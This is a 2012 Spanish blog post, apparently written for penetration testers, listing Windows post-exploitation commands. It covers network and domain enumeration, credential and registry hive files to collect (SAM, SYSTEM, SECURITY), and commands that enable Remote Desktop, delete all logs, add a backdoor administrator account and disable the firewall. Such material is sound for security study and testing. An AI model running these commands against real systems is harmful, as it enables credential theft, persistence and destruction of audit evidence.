lunes, 5 de noviembre de 2012

Cosas que hacer dentro...Post Explotation en Windows

Como todos sabéis, después de leer mi post sobre post-explotation meterpreter voy a seguir con algún que otro comando interesante, esta vez desde la shell de sistemas Windows, para comprometer aún más un sistema, acceder a más información etc.
A la hora de realizar un test de intrusión no basta con hacerle una carpeta en el disco duro del servidor, podemos encontrar con un gerente que no le baste con esto, yo sería así xD por lo que hay que trabajar bastante en la post-explotación.

ipconfig /displaydns: muestra la cache dns del equipo en cuestión. sin hacer DNS cache snooping ni nada.
podemos probar después a hacer un ipconfig/flushdns para liberar la cache, y volver a lanzarlo. Sería interesante hacer un flushdns como logout script para minimizar estos comportamientos?
net view /domain:nombredeldominio: listar los equipos en una red con dominio.
net user /domain: lista usuarios en el dominio...
route print: muestra la tabla de rutas, interesante para averiguar subredes y enlaces hacia otras redes de proveedores, colaboradores, por ejemplo, una empresa de outsourcing dentro la organización ( sin salida por internet)
netsh wlan show profiles: muestra los perfiles de conexión a redes wi-fi del equipo.
gpresult /z: conjunto resultante de directivas, como cuando usamos la mmc, pero en modo texto.

ficheros interesantes para su estudio posterior:
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\logfiles\httperr\httperr1.log
%SystemDrive%\inetpub\logs\LogFiles 
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
 %WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
 %WINDIR%\system32\config\default.sav
 %WINDIR%\system32\config\security.sav
 %WINDIR%\system32\config\software.sav
 %WINDIR%\system32\config\system.sav
 %WINDIR%\system32\CCM\logs\*.log
 %USERPROFILE%\ntuser.dat
 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
 %WINDIR%\System32\drivers\etc\hosts


tasklist /V /S nombre :Procesos ejecutados en un pc remoto dentro la red.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f : hablitar el servicio Remote Desktop.
 del %WINDIR%\*.log /a /s /q /f : borrar todos los fichero de log´s en esa ruta.
net user usuario clave /add: añadir un usuario local.
net localgroup administradores /add usuario: añadir el usuario dado al grupo administradores locales.
netsh firewall set opmode disable:deshabilitar el firewall de windows.


El amigo de Seguridad a lo jabali está recopilando un monton de "kung fu" line commands en su blog, te sugiero que le pegues un vistazo, ya que encontrarás líneas dedicas a la administración de sistemas Windows.

Como siempre, gracias por leerme !!!